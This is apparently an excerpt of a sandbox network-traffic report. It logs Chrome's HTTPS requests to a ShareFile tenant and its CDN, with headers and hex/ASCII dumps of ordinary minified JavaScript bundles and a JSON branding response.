                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC1378INData Raw: 30 3b 73 2b 3d 35 29 74 3d 28 65 3d 28 6e 3d 28 65 3d 28 69 3d 28 65 3d 28 72 3d 28 65 3d 28 6f 3d 28 65 3d 74 3c 3c 35 7c 74 3e 3e 3e 32 37 29 2b 28 6e 5e 69 5e 72 29 2b 6f 2b 31 38 35 39 37 37 35 33 39 33 2b 61 5b 73 5d 3c 3c 30 29 3c 3c 35 7c 6f 3e 3e 3e 32 37 29 2b 28 74 5e 28 6e 3d 6e 3c 3c 33 30 7c 6e 3e 3e 3e 32 29 5e 69 29 2b 72 2b 31 38 35 39 37 37 35 33 39 33 2b 61 5b 73 2b 31 5d 3c 3c 30 29 3c 3c 35 7c 72 3e 3e 3e 32 37 29 2b 28 6f 5e 28 74 3d 74 3c 3c 33 30 7c 74 3e 3e 3e 32 29 5e 6e 29 2b 69 2b 31 38 35 39 37 37 35 33 39 33 2b 61 5b 73 2b 32 5d 3c 3c 30 29 3c 3c 35 7c 69 3e 3e 3e 32 37 29 2b 28 72 5e 28 6f 3d 6f 3c 3c 33 30 7c 6f 3e 3e 3e 32 29 5e 74 29 2b 6e 2b 31 38 35 39 37 37 35 33 39 33 2b 61 5b 73 2b 33 5d 3c 3c 30 29 3c 3c 35 7c 6e 3e
                                                                                                                                                                                                                      Data Ascii: 0;s+=5)t=(e=(n=(e=(i=(e=(r=(e=(o=(e=t<<5|t>>>27)+(n^i^r)+o+1859775393+a[s]<<0)<<5|o>>>27)+(t^(n=n<<30|n>>>2)^i)+r+1859775393+a[s+1]<<0)<<5|r>>>27)+(o^(t=t<<30|t>>>2)^n)+i+1859775393+a[s+2]<<0)<<5|i>>>27)+(r^(o=o<<30|o>>>2)^t)+n+1859775393+a[s+3]<<0)<<5|n>
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC1378INData Raw: 26 31 35 5d 2b 6f 5b 31 35 26 74 5d 2b 6f 5b 6e 3e 3e 32 38 26 31 35 5d 2b 6f 5b 6e 3e 3e 32 34 26 31 35 5d 2b 6f 5b 6e 3e 3e 32 30 26 31 35 5d 2b 6f 5b 6e 3e 3e 31 36 26 31 35 5d 2b 6f 5b 6e 3e 3e 31 32 26 31 35 5d 2b 6f 5b 6e 3e 3e 38 26 31 35 5d 2b 6f 5b 6e 3e 3e 34 26 31 35 5d 2b 6f 5b 31 35 26 6e 5d 2b 6f 5b 69 3e 3e 32 38 26 31 35 5d 2b 6f 5b 69 3e 3e 32 34 26 31 35 5d 2b 6f 5b 69 3e 3e 32 30 26 31 35 5d 2b 6f 5b 69 3e 3e 31 36 26 31 35 5d 2b 6f 5b 69 3e 3e 31 32 26 31 35 5d 2b 6f 5b 69 3e 3e 38 26 31 35 5d 2b 6f 5b 69 3e 3e 34 26 31 35 5d 2b 6f 5b 31 35 26 69 5d 2b 6f 5b 72 3e 3e 32 38 26 31 35 5d 2b 6f 5b 72 3e 3e 32 34 26 31 35 5d 2b 6f 5b 72 3e 3e 32 30 26 31 35 5d 2b 6f 5b 72 3e 3e 31 36 26 31 35 5d 2b 6f 5b 72 3e 3e 31 32 26 31 35 5d 2b 6f 5b
                                                                                                                                                                                                                      Data Ascii: &15]+o[15&t]+o[n>>28&15]+o[n>>24&15]+o[n>>20&15]+o[n>>16&15]+o[n>>12&15]+o[n>>8&15]+o[n>>4&15]+o[15&n]+o[i>>28&15]+o[i>>24&15]+o[i>>20&15]+o[i>>16&15]+o[i>>12&15]+o[i>>8&15]+o[i>>4&15]+o[15&i]+o[r>>28&15]+o[r>>24&15]+o[r>>20&15]+o[r>>16&15]+o[r>>12&15]+o[
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC1378INData Raw: 75 72 6e 21 65 2e 75 6e 6d 69 6e 69 66 69 65 64 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 72 65 74 75 72 6e 22 65 78 74 65 6e 73 69 6f 6e 22 3d 3d 3d 65 2e 69 6e 73 74 61 6c 6c 54 79 70 65 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 72 65 74 75 72 6e 21 46 28 65 29 26 26 21 4d 28 65 29 26 26 7a 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 47 28 65 2c 74 29 7b 72 65 74 75 72 6e 21 46 28 65 29 26 26 50 28 65 29 26 26 74 7d 66 75 6e 63 74 69 6f 6e 20 55 28 65 29 7b 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 5b 5d 29 3b 66 6f 72 28 76 61 72 20 74 3d 2f 5e 68 74 74 70 73 3a 5c 2f 5c 2f 5b 5c 77 5c 2d 2e 5d 2a 63 64 6e 5b 5c 77 5c 2d 2e 5d 2a 5c 2e 28 70 65 6e 64 6f 2d 64 65 76 5c 2e 63 6f 6d 7c 70 65 6e 64 6f 5c 2e 69 6f 29 5c 2f 61 67 65 6e 74 5c 2f 73 74 61
                                                                                                                                                                                                                      Data Ascii: urn!e.unminified}function F(e){return"extension"===e.installType}function D(e){return!F(e)&&!M(e)&&z(e)}function G(e,t){return!F(e)&&P(e)&&t}function U(e){void 0===e&&(e=[]);for(var t=/^https:\/\/[\w\-.]*cdn[\w\-.]*\.(pendo-dev\.com|pendo\.io)\/agent\/sta
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC1378INData Raw: 66 75 6e 63 74 69 6f 6e 20 73 65 28 65 2c 74 2c 6e 29 7b 69 66 28 44 28 65 29 29 7b 65 3d 42 28 65 2c 21 30 2c 6e 29 3b 69 66 28 65 29 72 65 74 75 72 6e 20 56 28 74 29 2c 63 65 28 65 2c 74 29 2c 21 30 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 75 65 28 65 2c 74 2c 6e 29 7b 69 66 28 47 28 65 2c 6e 29 29 7b 65 3d 42 28 65 2c 21 31 2c 6e 29 3b 69 66 28 65 29 72 65 74 75 72 6e 20 56 28 74 29 2c 63 65 28 65 2c 74 29 2c 21 30 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 64 65 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 73 65 28 65 2c 74 2c 6e 29 7c 7c 75 65 28 65 2c 74 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 2c 74 29 7b 76 61 72 20 6e 3d 6f 77 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 2c 74 3d
                                                                                                                                                                                                                      Data Ascii: function se(e,t,n){if(D(e)){e=B(e,!0,n);if(e)return V(t),ce(e,t),!0}return!1}function ue(e,t,n){if(G(e,n)){e=B(e,!1,n);if(e)return V(t),ce(e,t),!0}return!1}function de(e,t,n){return se(e,t,n)||ue(e,t,n)}function ce(e,t){var n=ow.createElement("script"),t=
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC1378INData Raw: 6c 65 28 22 74 6f 53 74 72 69 6e 67 22 29 2c 4a 3d 5b 22 76 61 6c 75 65 4f 66 22 2c 22 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 22 2c 22 74 6f 53 74 72 69 6e 67 22 2c 22 70 72 6f 70 65 72 74 79 49 73 45 6e 75 6d 65 72 61 62 6c 65 22 2c 22 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 22 2c 22 74 6f 4c 6f 63 61 6c 65 53 74 72 69 6e 67 22 5d 2c 56 3d 4d 61 74 68 2e 70 6f 77 28 32 2c 35 33 29 2d 31 3b 66 75 6e 63 74 69 6f 6e 20 63 28 72 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 6e 75 6c 6c 3d 3d 6f 3f 72 2e 6c 65 6e 67 74 68 2d 31 3a 2b 6f 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 4d 61 74 68 2e 6d 61 78 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2d 6f 2c 30 29 2c 74 3d 41 72 72 61 79 28 65 29 2c 6e 3d 30 3b 6e 3c 65 3b 6e 2b 2b 29 74
                                                                                                                                                                                                                      Data Ascii: le("toString"),J=["valueOf","isPrototypeOf","toString","propertyIsEnumerable","hasOwnProperty","toLocaleString"],V=Math.pow(2,53)-1;function c(r,o){return o=null==o?r.length-1:+o,function(){for(var e=Math.max(arguments.length-o,0),t=Array(e),n=0;n<e;n++)t
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC1378INData Raw: 65 29 26 26 57 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 75 65 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 64 65 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 3d 74 28 65 29 3b 72 65 74 75 72 6e 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 30 3c 3d 65 26 26 65 3c 3d 56 7d 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 5b 74 5d 7d 7d 76 61 72 20 6d 3d 63 65 28 22 62 79 74 65 4c 65 6e 67 74 68 22 29 2c 6c 65 3d 64 65 28 6d 29 2c 66 65 3d 2f 5c 5b 6f 62 6a 65 63 74 20 28 28 49 7c 55 69 29 6e 74 28 38 7c 31 36 7c 33 32
                                                                                                                                                                                                                      Data Ascii: e)&&W(e)}function ue(e){return function(){return e}}function de(t){return function(e){e=t(e);return"number"==typeof e&&0<=e&&e<=V}}function ce(t){return function(e){return null==e?void 0:e[t]}}var m=ce("byteLength"),le=de(m),fe=/\[object ((I|Ui)nt(8|16|32


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      16192.168.2.174972876.223.1.1664437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC1032OUTGET /bundles/7ba6967109e88a8ecd8d.js HTTP/1.1
                                                                                                                                                                                                                      Host: averellharriman.sharefile.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      Cookie: AWSALBTG=5FGP81tyGxUNz5m4yQ4dBH7FyGFSacBlWPJd+6nCxzunFfuHEAACT5kpbNDA3WRYWTZa052JrcNskLZKkikbe2c4j74yUaXW0XvhKa1yRmMOV29m3jaNq7YpDSd74dUx+y8rh15a/vdAAlS1PNUwip+/QfSneqwnoSLNuWaibxVb; AWSALBTGCORS=5FGP81tyGxUNz5m4yQ4dBH7FyGFSacBlWPJd+6nCxzunFfuHEAACT5kpbNDA3WRYWTZa052JrcNskLZKkikbe2c4j74yUaXW0XvhKa1yRmMOV29m3jaNq7YpDSd74dUx+y8rh15a/vdAAlS1PNUwip+/QfSneqwnoSLNuWaibxVb; AWSALB=gARLScAFO8trFu6DtZItKILC30QADn78brlDMvoUsb50V9llc0LJJTY7j3xxsb6s7fAzVY9vVXbtcnV0Rid83Jbcrcx071xkxmZMXbKaWWlsC4rCsTk1XjfcVrRw; AWSALBCORS=gARLScAFO8trFu6DtZItKILC30QADn78brlDMvoUsb50V9llc0LJJTY7j3xxsb6s7fAzVY9vVXbtcnV0Rid83Jbcrcx071xkxmZMXbKaWWlsC4rCsTk1XjfcVrRw
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC1429INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:06 GMT
                                                                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                                                                      Content-Length: 5339
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: AWSALBTG=Gj7zxZ/v3AZllr/qrK2qk5Ma10s0TuLhBaGjpviGKRqk/6VBbupdzNOvkxSJ9EmO3pHbmF2WAoglAkY3sYTcdCbOUSXYQi76bgVEMXNiubW6bHvS8tMmsrL6b4FI9ksG7V+Jygf0+r+qBhq/2NlMBRmhI9/CD/Q0rIPwxNo2Jho/; Expires=Tue, 12 Nov 2024 19:36:06 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBTGCORS=Gj7zxZ/v3AZllr/qrK2qk5Ma10s0TuLhBaGjpviGKRqk/6VBbupdzNOvkxSJ9EmO3pHbmF2WAoglAkY3sYTcdCbOUSXYQi76bgVEMXNiubW6bHvS8tMmsrL6b4FI9ksG7V+Jygf0+r+qBhq/2NlMBRmhI9/CD/Q0rIPwxNo2Jho/; Expires=Tue, 12 Nov 2024 19:36:06 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Set-Cookie: AWSALB=7AtmkEQIo5xu/95NoLk9NF+O//V3g6CbMClr21gtdKCMQnm/zgrRovsnryOdTPmhHpy6waU6kpFKGOkSJ/H8q3NRT0LMf/vNYSpSn7cNXsy2GXC3/5MU46EDkcZu; Expires=Tue, 12 Nov 2024 19:36:06 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBCORS=7AtmkEQIo5xu/95NoLk9NF+O//V3g6CbMClr21gtdKCMQnm/zgrRovsnryOdTPmhHpy6waU6kpFKGOkSJ/H8q3NRT0LMf/vNYSpSn7cNXsy2GXC3/5MU46EDkcZu; Expires=Tue, 12 Nov 2024 19:36:06 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                      ETag: "1db2f60e56c3b5b"
                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                      Last-Modified: Tue, 05 Nov 2024 08:58:35 GMT
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                      X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC5339INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 38 36 33 5d 2c 7b 36 36 35 33 33 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 6f 29 7b 76 61 72 20 65 3d 6f 28 38 30 38 31 29 2c 66 3d 6f 28 32 33 36 34 35 29 2c 72 3d 6f 28 36 31 36 36 37 29 2c 69 3d 6f 28 34 34 35 35 30 29 2c 61 3d 6f 28 31 37 39 37 29 2c 73 3d 6f 28 38 35 34 39 33 29 2c 63 3d 6f 28 36 36 34 30 36 29 2c 6c 3d 6f 28 32 36 30 38 32 29 2c 70 3d 6f 28 34 34 30 39 33 29 2c 75 3d 6f 28 33 35 37 31 35 29 2c 64
                                                                                                                                                                                                                      Data Ascii: (self.webpackChunk_sharefiledev_sharefile_appshell=self.webpackChunk_sharefiledev_sharefile_appshell||[]).push([[1863],{66533:function(n,t,o){var e=o(8081),f=o(23645),r=o(61667),i=o(44550),a=o(1797),s=o(85493),c=o(66406),l=o(26082),p=o(44093),u=o(35715),d


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      17192.168.2.174973013.248.193.2514437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC705OUTGET /sf/v3/Accounts/Branding HTTP/1.1
                                                                                                                                                                                                                      Host: averellharriman.sf-api.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      Cookie: AWSALBTGCORS=kcacQpXWo2/n9WIEBYCjup/TiLyy1YN3rksFjWFkA4qc8LQBhXs2CsF2Ddb8vZOdcEsS6CHblDPLdLgoWYTw8TIW/vjRPvExUyi2oVGBbsNuMCdZW0E+9lxecxz1w/zs3tc51+rnLcQHBQlpz/sJ/8zaOIx3TtbueixkoXXFHd2J; AWSALBCORS=bBYtQMvH4SMfqQ3yY3v0x9VBqt2wrRPPPG0F7qmHv4xYuko4DvQJcOQ3xzvev5Lg5NnOJQl9NuX9qgoO57GQWBO7/UpCvS1f4U+FuZIhq9dOipt89j4yIz/O2HB7
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC1523INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:06 GMT
                                                                                                                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                      Content-Length: 2996
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: AWSALBTG=2t37hBmHH/xUAMD8VhpSDaQs2iwkYt2pKv0hUomxpoPqoPBJw7lpCG60YyfMDsCCFyVZdKCfZCR6ftPASA5iIwfD1X/nXXdlG3FbVXcK7GNVFNl1uA84JUDHrXkW8mXhYdEmnbW4X/Lx6VG33ifCuRoYokKk3FQZPj5VwzjEw+Ef; Expires=Tue, 12 Nov 2024 19:36:06 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBTGCORS=2t37hBmHH/xUAMD8VhpSDaQs2iwkYt2pKv0hUomxpoPqoPBJw7lpCG60YyfMDsCCFyVZdKCfZCR6ftPASA5iIwfD1X/nXXdlG3FbVXcK7GNVFNl1uA84JUDHrXkW8mXhYdEmnbW4X/Lx6VG33ifCuRoYokKk3FQZPj5VwzjEw+Ef; Expires=Tue, 12 Nov 2024 19:36:06 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Set-Cookie: AWSALB=CmbaTwmXViZUaPBJPCFu4AzHeJDmpzA22LxmxNBw22a1HgAWTJd2PttFHwa07OLWVYJB/LSY3gNBVravXAv/t6Lxmx4aGPYTQaKUQSZKhAGcaqrnp121745wtpcm; Expires=Tue, 12 Nov 2024 19:36:06 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBCORS=CmbaTwmXViZUaPBJPCFu4AzHeJDmpzA22LxmxNBw22a1HgAWTJd2PttFHwa07OLWVYJB/LSY3gNBVravXAv/t6Lxmx4aGPYTQaKUQSZKhAGcaqrnp121745wtpcm; Expires=Tue, 12 Nov 2024 19:36:06 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                      Expires: Mon, 04 Nov 2024 19:36:06 GMT
                                                                                                                                                                                                                      Citrix-TransactionId: fdfec9aa-5745-4c4f-b050-621cf493ac67
                                                                                                                                                                                                                      CorrelationId: vk_HuVgClUyWwgY-Kit64w
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                      X-Robots-Tag: noindex
                                                                                                                                                                                                                      X-SFAPI-AccountId: a2686d04-5eab-df7f-5602-cc391d4b2e38
                                                                                                                                                                                                                      X-SFAPI-OAuthClientId:
                                                                                                                                                                                                                      X-SFAPI-AppCode: _None
                                                                                                                                                                                                                      X-SFAPI-RequestID: mN8oR9JkRkOrKjZfzKh26g
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC2996INData Raw: 7b 22 43 6f 6d 70 61 6e 79 4e 61 6d 65 22 3a 22 41 76 65 72 65 6c 6c 48 61 72 72 69 6d 61 6e 22 2c 22 55 73 65 41 64 76 61 6e 63 65 64 43 75 73 74 6f 6d 42 72 61 6e 64 69 6e 67 22 3a 66 61 6c 73 65 2c 22 41 64 76 61 6e 63 65 64 43 75 73 74 6f 6d 42 72 61 6e 64 69 6e 67 46 6f 6c 64 65 72 4e 61 6d 65 22 3a 22 22 2c 22 42 72 61 6e 64 69 6e 67 53 74 79 6c 65 73 22 3a 7b 7d 2c 22 42 72 61 6e 64 69 6e 67 4c 69 6e 6b 73 22 3a 7b 22 6f 64 61 74 61 2e 74 79 70 65 22 3a 22 53 68 61 72 65 46 69 6c 65 2e 41 70 69 2e 4d 6f 64 65 6c 73 2e 42 72 61 6e 64 69 6e 67 4c 69 6e 6b 73 22 7d 2c 22 4c 6f 67 6f 55 52 4c 22 3a 22 22 2c 22 50 72 65 66 65 72 65 6e 63 65 73 22 3a 7b 22 45 6e 61 62 6c 65 43 6c 69 65 6e 74 53 65 6e 64 22 3a 66 61 6c 73 65 2c 22 45 6e 61 62 6c 65 53 53
                                                                                                                                                                                                                      Data Ascii: {"CompanyName":"AverellHarriman","UseAdvancedCustomBranding":false,"AdvancedCustomBrandingFolderName":"","BrandingStyles":{},"BrandingLinks":{"odata.type":"ShareFile.Api.Models.BrandingLinks"},"LogoURL":"","Preferences":{"EnableClientSend":false,"EnableSS


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      18192.168.2.174973613.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC610OUTGET /sharefile-web/sharefiledev-conversations-pilet/1.94.10/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC589INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 77544
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2024 22:47:42 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:07 GMT
                                                                                                                                                                                                                      ETag: "7b642eb641428d924027759152bd26f4"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 4b3bed207ec72204ebc89ae818e573ee.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: ILiO8O1CuUZC4rAZeXt0a3J7aDnVfxYx0ruFyjJ_OXE0hY7612Gd8w==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 63 6f 6e 76 65 72 73 61 74 69 6f 6e 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 73 3d 7b 7d 2c 61 3d 7b 7d 2c 6f 3d 7b 7d 2c 75 3d 7b 7d 2c 63 3d 7b 7d 3b
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevconversationspilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(t,e){var n={},r={},i={},s={},a={},o={},u={},c={};
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 74 6f 72 3a 72 65 71 75 65 73 74 6c 69 73 74 5f 63 61 72 64 5f 61 63 74 69 6f 6e 73 60 7d 7d 2c 37 38 32 3a 28 74 2c 65 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 65 2c 7b 79 3a 28 29 3d 3e 6f 7d 29 3b 76 61 72 20 72 3d 6e 28 35 35 34 34 29 2c 69 3d 6e 28 33 30 32 39 29 2c 73 3d 6e 28 32 39 30 31 29 2c 61 3d 6e 28 34 34 36 37 29 2c 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 65 2c 6e 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3a 74 2e 50 72 6f 74 6f 63 6f 6c 3b 28 30 2c 69 2e 41 29 28 74 68 69 73 2c 74 29 2c 74 68 69 73 2e 65 6e 74 69 74 79 54 79 70 65
                                                                                                                                                                                                                      Data Ascii: tor:requestlist_card_actions`}},782:(t,e,n)=>{"use strict";n.d(e,{y:()=>o});var r=n(5544),i=n(3029),s=n(2901),a=n(4467),o=function(){function t(e,n){var r=arguments.length>2&&arguments[2]!==undefined?arguments[2]:t.Protocol;(0,i.A)(this,t),this.entityType
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 70 6f 72 74 73 3d 61 7d 2c 32 30 37 36 3a 74 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 65 78 70 6f 72 74 73 3d 6f 7d 2c 32 39 36 35 3a 74 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 65 78 70 6f 72 74 73 3d 75 7d 2c 38 31 30 39 3a 74 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 65 78 70 6f 72 74 73 3d 63 7d 2c 33 31 34 35 3a 28 74 2c 65 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 74 2c 65 29 7b 28 6e 75 6c 6c 3d 3d 65 7c 7c 65 3e 74 2e 6c 65 6e 67 74 68 29 26 26 28 65 3d 74 2e 6c 65 6e 67 74 68 29 3b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 41 72 72 61 79 28 65 29 3b 6e 3c 65 3b 6e 2b 2b 29 72 5b 6e 5d 3d 74 5b 6e 5d 3b 72 65 74 75 72 6e 20 72 7d 6e 2e 64 28 65 2c 7b 41 3a 28 29
